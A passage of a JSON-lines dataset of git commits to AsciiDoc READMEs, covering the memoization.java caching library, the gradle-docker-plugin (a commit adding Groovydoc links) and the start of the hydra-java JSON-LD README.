`Predicate`, `Supplier` and other functional interfaces in `java.util.function`\n* Cache values using link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine], link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava], link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] or any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`]\n* Customize cache key calculation\n\n.Coverage of `java.util.function`\n|===\n| | Caffeine | Guava | JCache | ConcurrentMap\n\n| link:{jdk-api}\/java\/util\/function\/BiConsumer.html[BiConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiFunction.html[BiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiPredicate.html[BiPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BooleanSupplier.html[BooleanSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Consumer.html[Consumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleBinaryOperator.html[DoubleBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleConsumer.html[DoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleFunction.html[DoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoublePredicate.html[DoublePredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleSupplier.html[DoubleSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToIntFunction.html[DoubleToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToLongFunction.html[DoubleToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleUnaryOperator.html[DoubleUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Function.html[Function]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntBinaryOperator.html[IntBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntConsumer.html[IntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntFunction.html[IntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntPredicate.html[IntPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntSupplier.html[IntSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToDoubleFunction.html[IntToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToLongFunction.html[IntToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntUnaryOperator.html[IntUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongBinaryOperator.html[LongBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongConsumer.html[LongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongFunction.html[LongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongPredicate.html[LongPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongSupplier.html[LongSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToDoubleFunction.html[LongToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToIntFunction.html[LongToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongUnaryOperator.html[LongUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjDoubleConsumer.html[ObjDoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjIntConsumer.html[ObjIntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjLongConsumer.html[ObjLongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Predicate.html[Predicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Supplier.html[Supplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleBiFunction.html[ToDoubleBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleFunction.html[ToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntBiFunction.html[ToIntBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntFunction.html[ToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongBiFunction.html[ToLongBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongFunction.html[ToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n|===\n\n\n== Development Status\n\nThe Caffeine, Guava, JCache and `ConcurrentMap` based implementations cover all functional interfaces from `java.util.function`. Take a look at the link:https:\/\/github.com\/sebhoss\/memoization.java\/issues[open tickets] for future ideas & ways to help out.\n\n== Usage\n\nMemoize any of the supported types by using the static factory methods supplied by:\n\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-caffeine\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-caffeine.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `CaffeineMemoize` if you want to use link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-guava\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-guava.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `GuavaMemoize` if you want to use link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-jcache\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-jcache.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `JCacheMemoize` if you want to use link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] (JSR107) caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-core\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-core.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `MapMemoize` if you want to use any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`] as cache.\n\n=== Default cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier);\n----\n\n=== Default cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier);\n----\n\n=== Custom cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nCache<INPUT, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nCache<INPUT, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nCache<INPUT, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nMap<String, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, cache);\n----\n\n=== Custom cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nMap<KEY, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier, cache);\n----\n\nNote that `MapMemoize` does accept any `Map`, however copies the entries in the map to a new `ConcurrentHashMap` in case the provided `Map` is not a `ConcurrentMap` as well. This is done in order to ensure atomic `computeIfAbsent` behavior.\n\n=== Integration\n\nIn order to use this project, declare the following inside your POM:\n\n[source, xml, subs=\"attributes,verbatim\"]\n----\n<dependencies>\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-core<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n\n <!-- CAFFEINE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-caffeine<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.github.ben-manes.caffeine<\/groupId>\n <artifactId>caffeine<\/artifactId>\n <version>${version.caffeine}<\/version>\n <\/dependency>\n <!-- CAFFEINE ONLY -->\n\n <!-- GUAVA ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-guava<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.google.guava<\/groupId>\n <artifactId>guava<\/artifactId>\n <version>${version.guava}<\/version>\n <\/dependency>\n <!-- GUAVA ONLY -->\n\n <!-- JCACHE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-jcache<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>javax.cache<\/groupId>\n <artifactId>cache-api<\/artifactId>\n <version>${version.jcache}<\/version>\n <\/dependency>\n <!-- Add your JCache implementation here -->\n <dependency>\n <groupId>...<\/groupId>\n <artifactId>...<\/artifactId>\n <version>...<\/version>\n <\/dependency>\n <!-- JCACHE ONLY -->\n\n<\/dependencies>\n----\n\nReplace `${version.memoization}` with the pass:[<a href=\"https:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3Ade.xn--ho-hia.memoization\">latest release<\/a>]. This project follows the link:http:\/\/semver.org\/[semantic versioning guidelines].\nPopular JCache implementations are link:http:\/\/www.ehcache.org\/[Ehcache], link:http:\/\/commons.apache.org\/proper\/commons-jcs\/[Commons JCS], link:https:\/\/hazelcast.org\/[Hazelcast], link:http:\/\/infinispan.org\/[Infinispan], link:https:\/\/ignite.apache.org\/[Apache Ignite] and link:http:\/\/www.alachisoft.com\/tayzgrid\/[TayzGrid].\nUse link:https:\/\/github.com\/jhalterman\/expiringmap[ExpiringMap], link:https:\/\/github.com\/ben-manes\/concurrentlinkedhashmap[ConcurrentLinkedHashMap], link:https:\/\/github.com\/OpenHFT\/Chronicle-Map[Chronicle-Map], link:http:\/\/www.cacheonix.org\/[Cacheonix] or other `ConcurrentMap` implementations as alternatives to the default `ConcurrentHashMap` used in the `MapMemoize` factory. Caches like link:http:\/\/cache2k.org\/[cache2k] can be used together with both `JCacheMemoize` as a JSR-107 cache and `MapMemoize` by calling `cache.asMap()`.\n\n=== Compatibility\n\nThis project is compatible with the following Java versions:\n\n.Java compatibility\n|===\n| | 1.X.Y | 2.X.Y\n\n| Java 8\n| \u2713\n| \u2713\n|===\n\n== Alternatives\n\n* link:http:\/\/www.tek271.com\/software\/java\/memoizer[Tek271 Memoizer]\n* link:https:\/\/github.com\/kelvinguu\/gitmemoizer[GitMemoizer]\n* link:http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/cache.html#cache-annotations-cacheable[Spring's `@Cacheable`]\n* link:https:\/\/github.com\/marmelo\/chili#memoize[Chili's `@Memoize`]\n* link:https:\/\/clojuredocs.org\/clojure.core\/memoize[Clojure's `(memoize f)`]\n* link:http:\/\/docs.groovy-lang.org\/latest\/html\/gapi\/groovy\/transform\/Memoized.html[Groovy's `@Memoized`]\n* link:https:\/\/github.com\/cb372\/scalacache#memoization-of-method-results[ScalaCache's `memoize`]\n* link:https:\/\/github.com\/aol\/cyclops\/tree\/master\/cyclops-javaslang#memoization-with-a-guava-cache[Cyclops' `Memoize`]\n* link:https:\/\/github.com\/pakoito\/RxMemoization[RxMemoization]\n* link:https:\/\/github.com\/jmorwick\/memoized[memoized]\n* link:https:\/\/github.com\/ggrandes\/memoizer[memoizer]\n* link:http:\/\/aspects.jcabi.com\/annotation-cacheable.html[jcabi's `@Cacheable`]\n\n== License\n\nTo the extent possible under law, the author(s) have dedicated all copyright\nand related and neighboring rights to this software to the public domain\nworldwide. This software is distributed without any warranty.\n\nYou should have received a copy of the CC0 Public Domain Dedication along\nwith this software. If not, see http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/.\n\n== Mirrors\n\n* https:\/\/github.com\/sebhoss\/memoization.java\n* https:\/\/bitbucket.org\/sebhoss\/memoization.java\n* https:\/\/gitlab.com\/sebastian.hoss\/memoization.java\n* http:\/\/v2.pikacode.com\/sebhoss\/memoization.java\n* http:\/\/repo.or.cz\/memoization.java.git\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"67ebd339b44f11d0c420c29927e7cad4577683da","subject":"Link to Groovydoc for better usability.","message":"Link to Groovydoc for better usability.\n","repos":"bmuschko\/gradle-docker-plugin,orzeh\/gradle-docker-plugin,cdancy\/gradle-docker-plugin,childnode\/gradle-docker-plugin,odybour\/gradle-docker-plugin,Salmondx\/gradle-docker-plugin,orzeh\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,cdancy\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,odybour\/gradle-docker-plugin,mjacques\/gradle-docker-plugin,mjacques\/gradle-docker-plugin,llamahunter\/gradle-docker-plugin,childnode\/gradle-docker-plugin,llamahunter\/gradle-docker-plugin,Salmondx\/gradle-docker-plugin","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"Gradle Docker plugin\n====================\n\nimage:https:\/\/d3oypxn00j2a10.cloudfront.net\/0.12.6\/img\/nav\/docker-logo-loggedout.png[Docker Logo]\n\nGradle plugin for managing link:https:\/\/www.docker.io\/[Docker] images and containers using via its\nlink:http:\/\/docs.docker.io\/reference\/api\/docker_remote_api\/[remote API]. The heavy lifting of communicating with the\nDocker remote API is handled by the link:https:\/\/github.com\/docker-java\/docker-java[Docker Java library]. Currently,\nversion 0.10.3 is used which assumes Docker's client API v1.13.1.\n\n== Usage\n\nTo use the plugin, include in your build script:\n\n[source,groovy]\n----\nbuildscript {\n repositories {\n jcenter()\n }\n\n dependencies {\n classpath 'com.bmuschko:gradle-docker-plugin:0.5'\n }\n}\n\napply plugin: 'com.bmuschko.docker-remote-api'\n----\n\n\n=== Custom task types\n\n==== Misc\n\nThe plugin provides the following general-purpose custom task types:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|DockerInfo |Displays system-wide information.\n|DockerVersion |Show the docker version information.\n|=======\n\n\n==== Images\n\nThe plugin provides the following custom task types for managing images:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/Dockerfile.html[Dockerfile] |Creates a Dockerfile based on the provided instructions.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerBuildImage.html[DockerBuildImage] |Builds an image from a Dockerfile.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerCommitImage.html[DockerCommitImage] |Creates a new image from a container's changes.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerInspectImage.html[DockerInspectImage] |Returns low-level information on the image.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerListImages.html[DockerListImages] |Lists images in registry.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerPullImage.html[DockerPullImage] |Pulls an image from the registry.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerPushImage.html[DockerPushImage] |Pushes an image to a registry.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerRemoveImage.html[DockerRemoveImage] |Removes an image from the filesystem.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/image\/DockerTagImage.html[DockerTagImage] |Tags an image in registry.\n|=======\n\n\n==== Containers\n\nThe plugin provides the following custom task types for managing containers:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerCreateContainer.html[DockerCreateContainer] |Creates a container.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerKillContainer.html[DockerKillContainer] |Kills the container for a given id.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerRemoveContainer.html[DockerRemoveContainer] |Removes the container for a given id from the filesystem.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerRestartContainer.html[DockerRestartContainer] |Restarts the container for a given id.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerStartContainer.html[DockerStartContainer] |Starts the container for a given id.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerStopContainer.html[DockerStopContainer] |Stops the container for a given id.\n|link:http:\/\/bmuschko.github.io\/gradle-docker-plugin\/docs\/groovydoc\/com\/bmuschko\/gradle\/docker\/tasks\/container\/DockerWaitContainer.html[DockerWaitContainer] |Blocks until container for a given id stops, then returns the exit code.\n|=======\n\n\n=== Extension properties\n\nThe plugin defines the following extension properties in the `docker` closure:\n\n[options=\"header\"]\n|=======\n|Property name |Type |Default value |Description\n|`serverUrl` |String |null |The server URL to connect to via Docker's remote API.\n|=======\n\nFor pushing an image to the Docker Hub registry or to a self-hosted one, you will also need to provide credentials in\nthe `credentials` closure:\n\n[options=\"header\"]\n|=======\n|Property name |Type |Default value |Description\n|`username` |String |null |The registry username.\n|`password` |String |null |The registry password.\n|`email` |String |null |The registry email address.\n|=======\n\n\n=== Example\n\nThe following example code demonstrates how to build a Docker image from a Dockerfile, starts up a container for this\nimage and exercises functional tests agains the running container. At the end of this operation, the container is stopped.\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.*\nimport com.bmuschko.gradle.docker.tasks.image.*\n\ndocker {\n serverUrl = 'http:\/\/remote.docker.com:2375'\n\n credentials {\n username = 'bmuschko'\n password = 'pwd'\n email = 'benjamin.muschko@gmail.com'\n }\n}\n\ntask buildMyAppImage(type: DockerBuildImage) {\n inputDir = file('docker\/myapp')\n tag = 'test\/myapp'\n}\n\ntask createMyAppContainer(type: DockerCreateContainer) {\n dependsOn buildMyAppImage\n targetImageId { buildMyAppImage.getImageId() }\n}\n\ntask startMyAppContainer(type: DockerStartContainer) {\n dependsOn createMyAppContainer\n targetContainerId { createMyAppContainer.getContainerId() }\n}\n\ntask stopMyAppContainer(type: DockerStopContainer) {\n targetContainerId { createMyAppContainer.getContainerId() }\n}\n\ntask functionalTestMyApp(type: Test) {\n dependsOn startMyAppContainer\n finalizedBy stopMyAppContainer\n}\n----","old_contents":"Gradle Docker plugin\n====================\n\nimage:https:\/\/d3oypxn00j2a10.cloudfront.net\/0.12.6\/img\/nav\/docker-logo-loggedout.png[Docker Logo]\n\nGradle plugin for managing link:https:\/\/www.docker.io\/[Docker] images and containers using via its\nlink:http:\/\/docs.docker.io\/reference\/api\/docker_remote_api\/[remote API]. The heavy lifting of communicating with the\nDocker remote API is handled by the link:https:\/\/github.com\/docker-java\/docker-java[Docker Java library]. Currently,\nversion 0.10.3 is used which assumes Docker's client API v1.13.1.\n\n== Usage\n\nTo use the plugin, include in your build script:\n\n[source,groovy]\n----\nbuildscript {\n repositories {\n jcenter()\n }\n\n dependencies {\n classpath 'com.bmuschko:gradle-docker-plugin:0.5'\n }\n}\n\napply plugin: 'com.bmuschko.docker-remote-api'\n----\n\n\n=== Custom task types\n\n==== Misc\n\nThe plugin provides the following general-purpose custom task types:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|DockerInfo |Displays system-wide information.\n|DockerVersion |Show the docker version information.\n|=======\n\n\n==== Images\n\nThe plugin provides the following custom task types for managing images:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|Dockerfile |Creates a Dockerfile based on the provided instructions.\n|DockerBuildImage |Builds an image from a Dockerfile.\n|DockerCommitImage |Creates a new image from a container's changes.\n|DockerInspectImage |Returns low-level information on the image.\n|DockerListImages |Lists images in registry.\n|DockerPullImage |Pulls an image from the registry.\n|DockerPushImage |Pushes an image to a registry.\n|DockerRemoveImage |Removes an image from the filesystem.\n|DockerTagImage |Tags an image in registry.\n|=======\n\n\n==== Containers\n\nThe plugin provides the following custom task types for managing containers:\n\n[options=\"header\"]\n|=======\n|Type |Description\n|DockerCreateContainer |Creates a container.\n|DockerKillContainer |Kills the container for a given id.\n|DockerRemoveContainer |Removes the container for a given id from the filesystem.\n|DockerRestartContainer |Restarts the container for a given id.\n|DockerStartContainer |Starts the container for a given id.\n|DockerStopContainer |Stops the container for a given id.\n|DockerWaitContainer |Blocks until container for a given id stops, then returns the exit code.\n|=======\n\n\n=== Extension properties\n\nThe plugin defines the following extension properties in the `docker` closure:\n\n[options=\"header\"]\n|=======\n|Property name |Type |Default value |Description\n|`serverUrl` |String |null |The server URL to connect to via Docker's remote API.\n|=======\n\nFor pushing an image to the Docker Hub registry or to a self-hosted one, you will also need to provide credentials in\nthe `credentials` closure:\n\n[options=\"header\"]\n|=======\n|Property name |Type |Default value |Description\n|`username` |String |null |The registry username.\n|`password` |String |null |The registry password.\n|`email` |String |null |The registry email address.\n|=======\n\n\n=== Example\n\nThe following example code demonstrates how to build a Docker image from a Dockerfile, starts up a container for this\nimage and exercises functional tests agains the running container. At the end of this operation, the container is stopped.\n\n[source,groovy]\n----\nimport com.bmuschko.gradle.docker.tasks.container.*\nimport com.bmuschko.gradle.docker.tasks.image.*\n\ndocker {\n serverUrl = 'http:\/\/remote.docker.com:2375'\n\n credentials {\n username = 'bmuschko'\n password = 'pwd'\n email = 'benjamin.muschko@gmail.com'\n }\n}\n\ntask buildMyAppImage(type: DockerBuildImage) {\n inputDir = file('docker\/myapp')\n tag = 'test\/myapp'\n}\n\ntask createMyAppContainer(type: DockerCreateContainer) {\n dependsOn buildMyAppImage\n targetImageId { buildMyAppImage.getImageId() }\n}\n\ntask startMyAppContainer(type: DockerStartContainer) {\n dependsOn createMyAppContainer\n targetContainerId { createMyAppContainer.getContainerId() }\n}\n\ntask stopMyAppContainer(type: DockerStopContainer) {\n targetContainerId { createMyAppContainer.getContainerId() }\n}\n\ntask functionalTestMyApp(type: Test) {\n dependsOn startMyAppContainer\n finalizedBy stopMyAppContainer\n}\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1404d9ff494ab3e51e391da2a8ffb3f807c6273d","subject":"Adjusted readme for version 0.3.0","message":"Adjusted readme for version 0.3.0\n","repos":"dschulten\/hydra-java","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"= hydra-java image:https:\/\/travis-ci.org\/dschulten\/hydra-java.svg?branch=master[\"Build Status\", link=\"https:\/\/travis-ci.org\/dschulten\/hydra-java\"]\n:toc:\n:toc-placement: preamble\n\nAnnotate your Java beans and serialize them as http:\/\/www.w3.org\/TR\/json-ld\/[json-ld] with http:\/\/www.hydra-cg.com\/spec\/latest\/core\/[hydra].\n\nStatus: Testing. Since the Hydra Specification is still a draft, expect incompatible changes.\n\nLatest release: 0.3.0\n\n== Problem\n\nThe meaning of json attributes in api responses, their possible values etc. is usually not obvious without referring to some \ninformation coming from outside the resource itself. That is due to the nature of json. Two solutions immediately come to mind. Both are ways of vendor-specific documentation, some are machine-readable, some aren't. \n\nDescribe the type in some sort of json-schema, wadl, raml, swagger or similar and publish it together with the resource. People could even generate classes from this information, if they wish to. My api users coming from a wsdl background scream for something like that. \n\nOr put up documentation pages to describe your ex:doodad extension relation types and make the documentation available by dereferencing http:\/\/example.com\/api\/rels#doodad.\n\nBut one of the rules for a ReSTful API is:\n\n[quote, Roy Fielding]\n____\nA REST API should never have \u201ctyped\u201d resources that are significant to the client. \nSpecification authors may use resource types for describing server implementation behind the interface, \nbut those types must be irrelevant and invisible to the client. \nThe only types that are significant to a client are the current representation\u2019s media type and standardized relation names. \n[Failure here implies that clients are assuming a resource structure due to out-of band information, \nsuch as a domain-specific standard, which is the data-oriented equivalent to RPC's functional coupling].\n____\n\nMy interpretation of this famous http:\/\/roy.gbiv.com\/untangled\/2008\/rest-apis-must-be-hypertext-driven[rant by Roy Fielding]:\n\nA publicly available media-type should give clients all necessary means to interpret a server response, \nand relation names for hyperlinks in the response must be 